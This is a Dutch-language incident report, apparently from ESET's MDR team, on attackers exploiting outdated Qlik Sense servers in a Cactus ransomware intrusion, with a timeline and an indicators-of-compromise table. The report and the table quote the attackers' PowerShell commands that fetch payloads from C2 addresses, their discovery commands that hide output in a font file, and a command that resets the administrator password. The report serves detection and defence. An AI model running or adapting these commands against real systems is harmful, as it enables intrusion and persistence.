Digitaal dreigingslandschap

Qlik Exploitation - Cactus Ransomware

12 minuten leestijd

door Michelle Dolk

Begin december 2023 kregen de MDR security analysten van ESET in de avonduren een hoge-prioriteitsmelding van verdachte activiteit in het netwerk van één van haar klanten.

Introductie

Begin december 2023 kregen de MDR security analysten van ESET in de avonduren een hoge-prioriteitsmelding van verdachte activiteit in het netwerk van één van haar klanten. Een bestand met de naam lsass.dmp werd weggeschreven door de Windows Task Manager.

artikel donny 1

artikel donny 1

Tijdlijn

Na onderzoek bleek dat het systeem in kwestie was voorzien van een verouderde versie van de software Qlik Sense. Deze software was bereikbaar via het internet en bevatte reeds bekende kwetsbaarheden met CVE-nummers CVE-2023-41265 en CVE-2023-41266. Deze kwetsbaarheden bleken uitgebuit op meerdere systemen in het netwerk. Na het uitbuiten werd via een PowerShell commando de legitieme tool ZOHO ManageEngine UEMS geïnstalleerd:

1. cmd.exe /c "powershell iwr -URI 'hxxp://216.107.136[.]46/Qliksens_Dec_update.zip' -OutFile 'C:\Windows\temp\AcRes.exe'"

Hiermee waren de aanvallers in staat volledig remote management te doen van de betreffende systemen. Via deze nieuwe toegang werden verschillende commando's uitgevoerd zoals whoami en systeminfo alvorens een nieuwe legitieme tool op de systemen te downloaden genaamd PuTTY. Via deze tool werd een zogenaamde reverse SSH tunnel opgezet naar de systemen wat de aanvallers in staat stelden in te loggen via Remote Desktop (RDP):

artikel donny 3

Vervolgens werd het wachtwoord van het lokale account Administrator veranderd zodat de aanvallers het konden gebruiken om interactieve toegang te krijgen tot de systemen. Ook probeerde men verschillende tools op de systemen te installeren. Deze werden echter direct gedetecteerd en verwijderd.

artikel donny 4

artikel donny 5

Ook hebben de aanvallers handmatig met de browser op één van de systemen naar een webpagina gegaan om ManageEngine Remote Access Plus te downloaden.

artikel donny 6

Op dit punt zijn alle systemen door het ESET MDR team in isolatie geplaatst zodat de aanvallers alle verbindingen naar dit specifieke netwerk zijn verloren.

Indicators of Compromise

Uit forensisch onderzoek zijn de volgende zogenaamde Indicators of Compromise (IoC) vastgesteld:

Indicator Type Context
216.107.136[.]46 IP Address C2 server IP address hosting payload
172.86.66[.]52 IP Address C2 server IP address hosting payload
C:\\Windows\\temp\\AcRes.exe FilePath Path to saved & renamed ManageEngine UEMS Agent
C:\\Windows\\Temp\\putty.exe FilePath Path to saved "putty.exe" application
C:\\Windows\\Temp\\agentInstallerComponent.exe FilePath Part of UEMS Agent installation
C:\\Windows\\Temp\\UEMSAgent.msi FilePath Part of UEMS Agent installation
C:\\Program Files\\Qlik\\Sense\\Client\\qmc\\fonts\\qle.woff FilePath File name of the saved output of discovery commands
C:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\temp\\Connect.exe FilePath Executable downloaded by ManageEngine UEMS that delivers ZohoAssist application
C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\lsass.dmp FilePath Dump of LSASS process
C:\\Windows\\temp\\upd.exe FilePath Win64/ProcessExplorer.A potentially unsafe application
49707700370b4d75fd57b4d84f2add67ce2aa3be SHA1 Hash C:\\Windows\\Temp\\agentInstallerComponent.exe
8fbe988eadf207dc4b9331ca23ed425ff1abe6b3 SHA1 Hash C:\\Windows\\Temp\\UEMSAgent.msi
5f52b721dbd9cd1b176532e926fb5594d4ea668c SHA1 Hash C:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\temp\\Connect.exe
24c786453a820ec144ba80e85581c577073506f3 SHA1 Hash C:\\Windows\\temp\\AcRes.exe
4709827c7a95012ab970bf651ed5183083366c79 SHA1 Hash C:\\Windows\\Temp\\putty.exe
Qliksens_patch.zip Filename C2 hosted ManageEngine UEMS Agent masquerading as QlikSense update
Qliksens_Dec_update.zip Filename C2 hosted ManageEngine UEMS Agent masquerading as QlikSense update
QlikSens_patch_november.zip Filename C2 hosted ManageEngine UEMS Agent masquerading as QlikSense update
cmd.exe /c "C:\\Windows\\temp\\AcRes.exe /silent" Command Command for silent installation of UEMS
cmd.exe /c "powershell iwr -URI 'hxxp://216.107.136.46/Qliksens_Dec_update.zip' -OutFile 'C:\\Windows\\temp\\AcRes.exe'" Command Command to run PowerShell and save the hosted payload as "AcRes.exe"
cmd.exe /c "powershell iwr -URI 'hxxp://172.86.66.52/QlikSens_patch_november.zip' -OutFile 'C:\\Windows\\temp\\AcRes.exe'" Command Command to run PowerShell and save the hosted payload as "AcRes.exe"
cmd.exe /c "powershell iwr -URI 'hxxp://172.86.66.52/Qliksens_patch.zip' -OutFile 'C:\\Windows\\temp\\AcRes.exe'" Command Command to run PowerShell and save the hosted payload as "AcRes.exe"
cmd.exe /c " whomai /all > ../Client/qmc/fonts/qle.woff " Command Mistyped "whoami" command
cmd.exe /c " whoami /all > ../Client/qmc/fonts/qle.woff " Command "whoami" discovery command
cmd.exe /c " query session > ./Client/qmc/fonts/qle.woff " Command "query" discovery command
cmd.exe /c " systeminfo > ../Client/qmc/fonts/qle.woff " Command "systeminfo" discovery command
cmd.exe /c " net user > ../Client/qmc/fonts/qle.woff " Command "net user" discovery command
cmd.exe /c " net group \"domain computers\" /domain > ../Client/qmc/fonts/qle.woff " Command "net group" discovery command
cmd.exe /c " net user administrator Fatman.110.110@123 > ../Client/qmc/fonts/qle.woff " Command Command used for changing Administrator password

 

In het ESET EDR product ESET Inspect zijn de volgende meldingen gemaakt:

artikel donny 7

Referenties